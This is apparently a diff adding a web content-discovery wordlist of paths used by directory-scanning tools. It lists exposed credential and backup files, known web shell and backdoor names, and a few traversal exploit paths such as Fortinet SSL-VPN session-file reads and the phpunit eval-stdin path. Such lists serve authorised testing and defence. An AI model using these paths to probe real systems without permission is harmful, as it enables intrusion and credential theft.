+pma2012/
+PMA2012/
+pma2013/
+PMA2013/
+pma2014/
+PMA2014/
+PMA2015/
+pma2015/
+pma2016/
+PMA2016/
+pma2017/
+PMA2017/
+pma2018/
+PMA2018/
+pma4/
+pmadmin/
+pmamy/index.php
+pmamy2/index.php
+pmd/index.php
+pmyadmin/
+pods/
+pom.xml
+pom.xml.asc
+pom.xml.next
+pom.xml.releaseBackup
+pom.xml.tag
+pom.xml.versionsBackup
+portal/
+postgresql.conf
+power_user/
+powershell/
+pprof/
+printenv
+printenv.tmp
+priv8.php
+private.key
+private.mdb
+private.sqlite
+privatekey.key
+processlogin
+processlogin.php
+Procfile
+Procfile.dev
+Procfile.offline
+product.json
+productcockpit/
+production.log
+profiles
+profiles.xml
+program/
+proguard/
+project-admins/
+project.fragment.lock.json
+project.lock.json
+project.xml
+project/project
+project/target
+prometheus
+prometheus/
+prometheus/targets
+propel.ini
+propel.json
+protected/data/
+protected/runtime/
+providers.json
+proxy.pac
+proxy.stream?origin=https://google.com
+proxy/
+proxy_config.json
+prv/
+PSUser/
+public
+public..
+public/
+public/hot
+public/storage
+public/system
+public_html.zip
+public_html/
+publication_list.xml
+publish/
+PublishScripts/
+pubspec.lock
+puppet/
+pureadmin/
+putty.reg
+pw.txt
+pwd.db
+pws.txt
+py-compile
+qa/
+qq.php
+qql/
+qsd-php-backdoor.php
+query.log
+QuickLook/
+quikstore.cfg
+r.php
+r00t.php
+r57.php
+r57eng.php
+r57shell.php
+r58.php
+r99.php
+rabbitmq/
+radius/
+radmind-1/
+radmind/
+rails/info/properties
+Rakefile
+raygun/
+rcf/
+rcjakar/
+rcjakar/admin/login.php
+rcLogin/
+rdoc/
+reach/sip.svc
+Read
+Read%20Me.txt
+read.me
+Read_Me.txt
+readme
+ReadMe
+README
+Readme
+README.htm
+ReadMe.html
+Readme.html
+readme.html
+README.HTML
+README.html
+ReadMe.md
+readme.md
+Readme.md
+README.MD
+README.md
+README.mkd
+readme.mkd
+readme.php
+Readme.txt
+README.txt
+README.TXT
+readme.txt
+ReadMe.txt
+recentservers.xml
+redis/
+redmine/
+refresh
+refresh.json
+register.php
+registration/
+registry/
+rel/example_project
+release.properties
+RELEASE_NOTES.txt
+relogin
+relogin.htm
+relogin.html
+relogin.php
+remote/fgt_lang?lang=/../../../../////////////////////////bin/sslvpnd
+remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
+repo/
+request.log
+requesthandler/
+requesthandlerext/
+requirements.txt
+rerun.txt
+reseller
+resources.xml
+resources/
+resources/.arch-internal-preview.css
+resources/fckeditor
+resources/sass/.sass-cache/
+resources/tmp/
+rest-api/
+rest-auth/
+rest/
+rest/v1
+rest/v3/doc
+restart
+restart.json
+restore.php
+restricted
+resume
+resume.json
+revision.inc
+revision.txt
+rgs/
+rgsclients/
+robot.txt
+robots.txt
+robots.txt.dist
+root
+root/
+RootCA.crt
+roundcube/index.php
+routes
+rpc/
+rpcwithcert/
+rsconnect/
+rst.php
+rudder/
+run.sh
+run.zip
+runningpods/
+RushSite.xml
+s.php
+sa.php
+sa2.php
+sales.csv
+sales.log
+sales.sql
+sales.sql.gz
+sales.txt
+sales.xls
+salesforce.schema
+saltstack/
+sample.txt
+sample.txt~
+Saved/
+sbt/
+scalyr/
+scheduledtasks
+scheduler/
+schema.sql
+schema.yml
+script.zip
+script/
+script/jqueryplugins/dataTables/extras/TableTools/media/swf/ZeroClipboard.swf
+scripts
+scripts.zip
+scripts/
+scripts/ckeditor/ckfinder/core/connector/asp/connector.asp
+scripts/ckeditor/ckfinder/core/connector/aspx/connector.aspx
+scripts/ckeditor/ckfinder/core/connector/php/connector.php
+scripts/setup.php
+sdb.php
+sdist/
+searchreplacedb2.php
+searchreplacedb2cli.php
+secret
+Secret/
+secret/
+secrets.env
+secrets/
+secring.bak
+secring.pgp
+secring.skr
+secure/
+security/
+selenium/
+sendgrid.env
+sensu/
+sentemails.log
+sentry/
+serv-u.ini
+Server
+server-info
+server-status
+server-status/
+server.cert
+server.cfg
+server.config.yaml
+server.js
+server.key
+server.log
+server.ovpn
+Server.php
+server.pid
+server.xml
+Server/
+server/config.json
+server/server.js
+server_admin_small/
+server_stats
+ServerAdministrator/
+ServerList.cfg
+ServerList.xml
+servers.xml
+serverStatus.log
+service-registry/instance-status
+service-registry/instance-status.json
+service.asmx
+service.yaml
+serviceaccount.crt
+ServiceFabricBackup/
+services
+services/
+services/config/databases.yml
+servlet/
+servlet/%C0%AE%C0%AE%C0%AF
+servlet/DMSDump
+servlet/oracle.xml.xsql.XSQLServlet/soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml
+servlet/Oracle.xml.xsql.XSQLServlet/soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml
+servlet/Oracle.xml.xsql.XSQLServlet/xsql/lib/XSQLConfig.xml
+servlet/oracle.xml.xsql.XSQLServlet/xsql/lib/XSQLConfig.xml
+servlet/SnoopServlet
+servlet/Spy
+session/
+sessions
+sessions/
+settings.php
+settings.php.bak
+settings.php.dist
+settings.php.old
+settings.php.save
+settings.php.swp
+settings.php.txt
+settings.php~
+settings.py
+settings.xml
+settings/
+Settings/ui.plist
+setup
+setup.data
+setup.log
+setup.php
+setup.sql
+setup/
+sftp-config.json
+Sh3ll.php
+sheep.php
+shell.php
+shell.sh
+shell/
+shellz.php
+shopdb/
+show
+showcode.asp
+showlogin/
+shutdown
+sidekiq
+sidekiq_monitor
+sign-in
+sign-in/
+sign_in
+sign_in/
+signin
+signin.php
+signin/
+signup.action
+simple-backdoor.php
+simpleLogin/
+sip/
+site
+site.rar
+site.sql
+site.tar
+site.tar.bz2
+site.tar.gz
+site.txt
+site.zip
+site/
+site/common.xml
+site_admin
+siteadmin
+siteadmin.php
+siteadmin/
+siteadmin/index.php
+siteadmin/login.html
+siteadmin/login.php
+sitemanager.xml
+sites.ini
+sites.xml
+sites/all/libraries/README.txt
+sites/all/modules/README.txt
+sites/all/themes/README.txt
+sites/default/private/files/backup_migrate/scheduled/test.txt
+sites/example.sites.php
+sites/README.txt
+sized/
+slapd.conf
+smblogin/
+snoop.jsp
+snort/
+soap/
+soap/servlet/soaprouter
+soap/servlet/Spy
+soapdocs/
+soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml
+soapserver/
+sonar/
+sonarcube/
+sonarqube/
+source
+source.php
+source.zip
+source/
+source/inspector.html
+source_gen
+source_gen.caches
+SourceArt/
+spamlog.log
+spec/
+spec/examples.txt
+spec/lib/database.yml
+spec/lib/settings.local.yml
+spec/reports/
+spec/tmp
+splunk/
+spwd.db
+spy.aspx
+sql-admin/
+sql.inc
+sql.php
+sql.sql
+sql.tar
+sql.tar.bz2
+sql.tar.gz
+sql.tgz
+sql.txt
+sql.zip
+sql/
+sql/index.php
+sql/myadmin/
+sql/php-myadmin/
+sql/phpmanager/
+sql/phpmy-admin/
+sql/phpMyAdmin/
+sql/phpmyadmin2/
+sql/phpMyAdmin2/
+sql/sql-admin/
+sql/sql/
+sql/sqladmin/
+sql/sqlweb/
+sql/webadmin/
+sql/webdb/
+sql/websql/
+sql_dumps
+sql_error.log
+sqladm
+sqladmin
+sqladmin/
+sqlbuddy
+sqlbuddy/
+sqlbuddy/login.php
+sqldump.sql
+sqlmanager/
+sqlmigrate.php
+sqlnet.log
+sqlweb/
+SQLyogTunnel.php
+SqueakDebug.log
+squid-reports/
+squid/
+squid3_log/
+src/
+src/app.js
+src/index.js
+src/server.js
+srv/
+srv_gen/
+ss_vms_admin_sm/
+ssh/
+sshadmin/
+ssl/
+st.php
+stackstorm/
+stacktrace.log
+staff/
+stage_create_service.sh
+stage_create_service_dev.sh
+stage_create_service_prod.sh
+stage_deploy.sh
+stage_deploy_dev.sh
+stage_deploy_prod.sh
+stamp-h1
+staradmin/
+start.html
+start.sh
+startServer.log
+startup.cfg
+startup.sh
+stas/
+stash/
+stat/
+static..
+static/dump.sql
+statistics
+statistics/
+stats
+stats/
+statsd/
+status.php
+status.xsl
+status/
+status?full=true
+statusicon/
+storage/
+storage/logs/laravel.log
+store.tgz
+StreamingStatistics
+stronghold-info
+stronghold-status
+stssys.htm
+StyleCopReport.xml
+stylesheets/bundles
+sub-login/
+subversion/
+sugarcrm.log
+supe.php
+super
+Super-Admin/
+super.php
+super1
+super1/
+super_inde.php
+super_index
+super_logi.php
+super_login
+superma.php
+superman
+superman/
+supermanage.php
+supermanager
+superuse.php
+superuser
+superuser.php
+superuser/
+supervise/
+supervise/Logi.php
+supervise/Login
+supervisor/
+supervisord/
+support/
+support_login/
+surgemail/
+surgemail/mtemp/surgeweb/tpl/shared/modules/swfupload.swf
+surgemail/mtemp/surgeweb/tpl/shared/modules/swfupload_f9.swf
+suspended.page
+svn.revision
+SVN/
+svn/
+svn/wc.db
+swagger
+swagger-resources
+swagger-ui
+swagger-ui.html
+swagger.json
+swagger.yaml
+swagger/index.html
+swagger/swagger-ui.htm
+swagger/swagger-ui.html
+swagger/ui
+swagger/v1/swagger.json
+swaggerui
+swfobject.js
+swfupload
+swfupload.swf
+sxd/
+sxd/backup/
+sxdpro/
+sYm.php
+Sym.php
+sym/
+sym/root/home/
+symfony/
+symfony/apps/frontend/config/routing.yml
+symfony/apps/frontend/config/settings.yml
+symfony/config/databases.yml
+Symlink.php
+Symlink.pl
+symphony/
+symphony/apps/frontend/config/app.yml
+symphony/apps/frontend/config/databases.yml
+symphony/config/app.yml
+symphony/config/databases.yml
+syncNode.log
+sypex.php
+sypexdumper.php
+SypexDumper_2011/
+sys-admin/
+sys/pprof
+sysadm
+sysadm.php
+sysadm/
+sysadmin
+sysadmin.php
+sysadmin/
+SysAdmin/
+SysAdmin2/
+sysadmins
+sysadmins/
+sysbackup
+sysinfo.txt
+syslog/
+system-administration/
+system.log
+system.zip
+system/
+system/cache/
+system/cron/cron.txt
+system/error.txt
+system/expressionengine/config/config.php
+system/expressionengine/config/database.php
+system/log/
+system/logs/
+system/storage/
+system_administration/
+SystemErr.log
+SystemOut.log
+t00.php
+tags
+tar
+tar.bz2
+tar.gz
+tar.php
+target
+target/
+tasks/
+tconn.conf
+team/
+technico.txt
+telephone
+telphin.log
+temp-testng-customsuite.xml
+temp.php
+temp.sql
+temp/
+TEMP/
+template/
+templates/
+templates/beez/index.php
+templates/beez3/
+templates/index.html
+templates/ja-helio-farsi/index.php
+templates/protostar/
+templates/rhuk_milkyway/index.php
+templates/system/
+templates_c/
+teraform/
+test
+test-build/
+test-driver
+test-output/
+test-report/
+test-result
+test.asp
+test.aspx
+test.chm
+test.htm
+test.html
+test.jsp
+test.mdb
+test.php
+test.sqlite
+test.txt
+test/
+test/php/test.html
+test/reports
+test/ssi/test.shtml
+test/tmp/
+test/version_tmp/
+test0.php
+test1
+test1.php
+test123.php
+test2
+test2.php
+test3.php
+test4.php
+test5.php
+test6.php
+test7.php
+test8.php
+test9.php
+test_
+test_gen
+test_gen.caches
+test_ip.php
+testfile.php
+Testing
+testproxy.php
+TestResult.xml
+tests
+tests/
+tests/phpunit_report.xml
+texinfo.tex
+textpattern/
+themes
+themes/
+themes/default/htdocs/flash/ZeroClipboard.swf
+Thorfile
+threaddump
+Thumbs.db
+thumbs.db
+thumbs/
+tikiwiki
+timeline.xctimeline
+tiny_mce/
+tiny_mce/plugins/filemanager/examples.html
+tiny_mce/plugins/imagemanager/pages/im/index.html
+tinyfilemanager-2.0.1/
+tinyfilemanager-2.0.2/
+tinyfilemanager-2.2.0/
+tinyfilemanager-2.3/
+tinyfilemanager.php
+tinyfilemanager/
+tinymce
+tinymce/
+TMP
+tmp
+tmp.php
+tmp/
+tmp/2.php
+tmp/access.log
+tmp/access_log
+tmp/admin.php
+tmp/cache/models/
+tmp/cache/persistent/
+tmp/cache/views/
+tmp/cgi.pl
+tmp/Cgishell.pl
+tmp/changeall.php
+tmp/cpn.php
+tmp/d.php
+tmp/d0maine.php
+tmp/domaine.php
+tmp/domaine.pl
+tmp/dz.php
+tmp/dz1.php
+tmp/error.log
+tmp/error_log
+tmp/index.php
+tmp/killer.php
+tmp/L3b.php
+tmp/madspotshell.php
+tmp/nanoc/
+tmp/priv8.php
+tmp/root.php
+tmp/sessions/
+tmp/sql.php
+tmp/Sym.php
+tmp/tests/
+tmp/up.php
+tmp/upload.php
+tmp/uploads.php
+tmp/user.php
+tmp/vaga.php
+tmp/whmcs.php
+tmp/xd.php
+TODO
+token.json
+tokenlite.zip
+tomcat-docs/appdev/sample/web/hello.jsp
+tomcat/axis/
+tools
+tools.php
+tools/
+tools/_backups/
+tools/phpMyAdmin/index.php
+trace
+Trace.axd
+Trace.axd::$DATA
+trace.json
+translate.sql
+transmission/web/
+tresearch/
+tresearch/happyaxis.jsp
+tripwire/
+trivia/
+tsconfig.json
+tst
+twitter/.env
+txt/
+typings/
+typo3
+typo3/
+typo3/phpmyadmin/
+typo3/phpmyadmin/index.php
+typo3/phpmyadmin/scripts/setup.php
+typo3_src
+typo3conf/AdditionalConfiguration.php
+typo3conf/temp_fieldInfo.php
+typo3temp/
+uber/
+uber/phpMemcachedAdmin/
+uber/phpMyAdmin/
+uber/phpMyAdminBackup/
+ucwa/
+uddi
+uddiexplorer
+ui
+ui/
+unattend.txt
+unifiedmessaging/
+up.php
+update
+update.php
+UPDATE.txt
+updates
+upfile.php
+UPGRADE
+upgrade.php
+upgrade.readme
+UPGRADE.txt
+UpgradeLog.XML
+upguard/
+upl.php
+Upload
+upload
+upload.asp
+upload.aspx
+upload.cfm
+upload.htm
+upload.html
+upload.php
+upload.php3
+upload.shtm
+upload.zip
+upload/
+upload/1.php
+upload/2.php
+upload/b_user.csv
+upload/b_user.xls
+upload/loginIxje.php
+upload/test.php
+upload/test.txt
+upload/upload.php
+upload2.php
+upload_backup/
+upload_file.php
+uploaded/
+uploader.php
+uploader/
+uploadfile.asp
+uploadfile.php
+uploadfiles.php
+uploadify.php
+uploadify/
+uploads.php
+uploads.zip
+uploads/
+uploads/dump.sql
+upstream_conf
+ur-admin
+ur-admin.php
+ur-admin/
+usage/
+user
+user.asp
+user.html
+user.php
+user.txt
+user/
+user/admin
+user/admin.php
+user_guide
+user_guide_src/build/
+user_guide_src/cilexer/build/
+user_guide_src/cilexer/dist/
+user_guide_src/cilexer/pycilexer.egg-info/
+user_uploads
+useradmin
+useradmin/
+userdb
+UserFile
+UserFiles
+userfiles
+userlogin
+userlogin.php
+UserLogin/
+usernames.txt
+users
+users.csv
+users.db
+users.ini
+users.json
+users.log
+users.mdb
+users.php
+users.sql
+users.sql.gz
+users.sqlite
+users.txt
+users.xls
+users/
+users/admin
+users/admin.php
+usr/
+usuario/
+usuarios/
+usuarios/login.php
+utility_login/
+uvpanel/
+uwsgi.ini
+v1
+v1.0
+v1.1
+v1.zip
+v1/
+v1/graphiql
+v1/graphql
+v1/playground
+v1/public/yql
+v1/test/js/console.html
+v1/test/js/console_ajax.js
+v2
+v2.0
+v2.zip
+v2/
+v2/_catalog
+v2/graphiql
+v2/graphql
+v2/keys/?recursive=true
+v2/playground
+v3
+v3/graphiql
+v3/graphql
+v3/playground
+vadmind/
+vagrant-spec.config.rb
+vagrant/
+Vagrantfile
+Vagrantfile.backup
+validator.php
+var/
+var/backups/
+var/bootstrap.php.cache
+var/cache/
+var/log
+var/log/
+var/log/authorizenet.log
+var/log/exception.log
+var/log/librepag.log
+var/log/old
+var/log/payment.log
+var/log/payment_authorizenet.log
+var/log/payment_paypal_express.log
+var/logs/
+var/package/
+var/sessions/
+variant/
+vault/
+vb.rar
+vb.sql
+vb.zip
+vendor/
+vendor/assets/bower_components
+vendor/bundle
+vendor/composer/installed.json
+vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
+vendors/
+venv.bak/
+venv/
+version
+version.txt
+VERSION.txt
+version/
+video-js.swf
+view-source
+view.php
+views
+vignettes/
+violations/
+vm
+vmailadmin/
+vorod
+vorod.php
+vorod/
+vorud
+vorud.php
+vorud/
+vpn/
+vqmod/checked.cache
+vqmod/logs/
+vqmod/mods.cache
+vqmod/vqcache/
+vtiger/
+vtigercrm/
+vtund.conf
+w.php
+wallet.dat
+wallet.json
+war/gwt_bree/
+war/WEB-INF/classes/
+war/WEB-INF/deploy/
+wc.php
+wcx_ftp.ini
+web-app/plugins
+web-app/WEB-INF/classes
+web-console/
+web-console/Invoker
+web-console/ServerInfo.jsp
+web-console/status?full=true
+WEB-INF./
+WEB-INF./web.xml
+WEB-INF/
+WEB-INF/config.xml
+WEB-INF/lib/_wl_cls_gen.jar
+WEB-INF/web.xml
+web-variables.env
+web.7z
+web.config
+web.config.bak
+web.config.bakup
+web.config.old
+web.config.temp
+web.config.tmp
+web.config.txt
+web.config::$DATA
+web.Debug.config
+web.rar
+web.Release.config
+web.sql
+web.tar
+web.tar.bz2
+web.tar.gz
+web.tgz
+web.xml
+web.zip
+web/
+web/bundles/
+web/phpMyAdmin/
+web/phpMyAdmin/index.php
+web/phpMyAdmin/scripts/setup.php
+web/scripts/setup.php
+web/uploads/
+webadmin
+webadmin.html
+webadmin.php
+webadmin/
+webadmin/admin.html
+webadmin/admin.php
+webadmin/index.html
+webadmin/index.php
+webadmin/login.html
+webadmin/login.php
+webalizer
+webapp/wm/runtime.jsp
+webdav.password
+webdav/
+webdav/index.html
+webdav/servlet/webdav/
+webdb/
+webgrind
+weblogs
+webmail/
+webmail/src/configtest.php
+webmaster
+webmaster.php
+webmaster/
+webmin/
+webpack.config.js
+webpack.mix.js
+website.git
+website.tar
+website.tar.bz2
+website.tar.gz
+website.zip
+websql/
+webstat
+webstat/
+webstats
+webstats.html
+webstats/
+webticket/
+webticket/webticketservice.svc
+weixiao.php
+well-known.zip
+wenzhang
+wget-log
+wheels/
+whmcs.php
+whmcs/
+whmcs/downloads/dz.php
+wiki/
+winscp.ini
+WinSCP.ini
+wizmysqladmin/
+wordpress.tar
+wordpress.tar.bz2
+wordpress.tar.gz
+wordpress.zip
+wordpress/
+wordpress/wp-login.php
+workspace.xml
+workspace/uploads/
+wp-admin/
+wp-admin/c99.php
+wp-admin/install.php
+wp-admin/setup-config.php
+wp-app.log
+wp-cli.yml
+wp-config-sample.php
+wp-config.inc
+wp-config.old
+wp-config.php
+wp-config.php.bak
+wp-config.php.dist
+wp-config.php.inc
+wp-config.php.old
+wp-config.php.save
+wp-config.php.swp
+wp-config.php.txt
+wp-config.php.zip
+wp-config.php~
+wp-content/
+wp-content/backup-db/
+wp-content/backups/
+wp-content/blogs.dir/
+wp-content/cache/
+wp-content/debug.log
+wp-content/mu-plugins/
+wp-content/plugins/adminer/inc/editor/index.php
+wp-content/plugins/count-per-day/js/yc/d00.php
+wp-content/plugins/hello.php
+wp-content/upgrade/
+wp-content/uploads/
+wp-content/uploads/dump.sql
+wp-content/uploads/file-manager/log.txt
+wp-includes/
+wp-includes/rss-functions.php
+wp-json/
+wp-json/wp/v2/users/
+wp-login.php
+wp-login/
+wp-register.php
+wp.php
+wp.rar/
+wp.zip
+wp/
+wp/wp-login.php
+wpad.dat
+ws.php
+WS_FTP.INI
+ws_ftp.ini
+WS_FTP.ini
+WS_FTP.LOG
+WS_FTP/
+WS_FTP/Sites/ws_ftp.ini
+wsadmin.traceout
+wsadmin.valout
+wsadminListener.out
+wshell.php
+wsman
+WSO.php
+wso.php
+wso2.5.1.php
+wso2.php
+wssgs/
+wssgs/happyaxis.jsp
+wstats
+wuwu11.php
+wvdial.conf
+www-error.log
+www-test/
+www.rar
+www.sql
+www.tar
+www.tar.bz2
+www.tar.gz
+www.tgz
+www.zip
+www/phpMyAdmin/index.php
+wwwboard/
+wwwboard/passwd.txt
+wwwlog
+wwwroot.7z
+wwwroot.rar
+wwwroot.sql
+wwwroot.tar
+wwwroot.tar.bz2
+wwwroot.tar.gz
+wwwroot.tgz
+wwwroot.zip
+wwwstat
+wwwstats.htm
+x.php
+xampp/
+xampp/phpmyadmin/
+xampp/phpmyadmin/index.php
+xampp/phpmyadmin/scripts/setup.php
+xcuserdata/
+xd.php
+xferlog
+xiaoma.php
+xlogin/
+xls/
+xml/
+xml/_common.xml
+xml/common.xml
+xmlrpc.php
+xmlrpc_server.php
+xphperrors.log
+xphpMyAdmin/
+xprober.php
+xshell.php
+xsl/
+xsl/_common.xsl
+xsl/common.xsl
+xslt/
+xsql/
+xsql/lib/XSQLConfig.xml
+xw.php
+xw1.php
+xx.php
+yaml.log
+yaml_cron.log
+yarn-debug.log
+yarn-error.log
+yarn.lock
+ylwrap
+yonetici
+yonetici.html
+yonetici.php
+yonetim
+yonetim.html
+yonetim.php
+yum.log
+zabbix/
+zebra.conf
+zehir.php
+zeroclipboard.swf
+zf_backend.php
+zimbra/
+zipkin/
+zone-h.php
+~/
+~admin/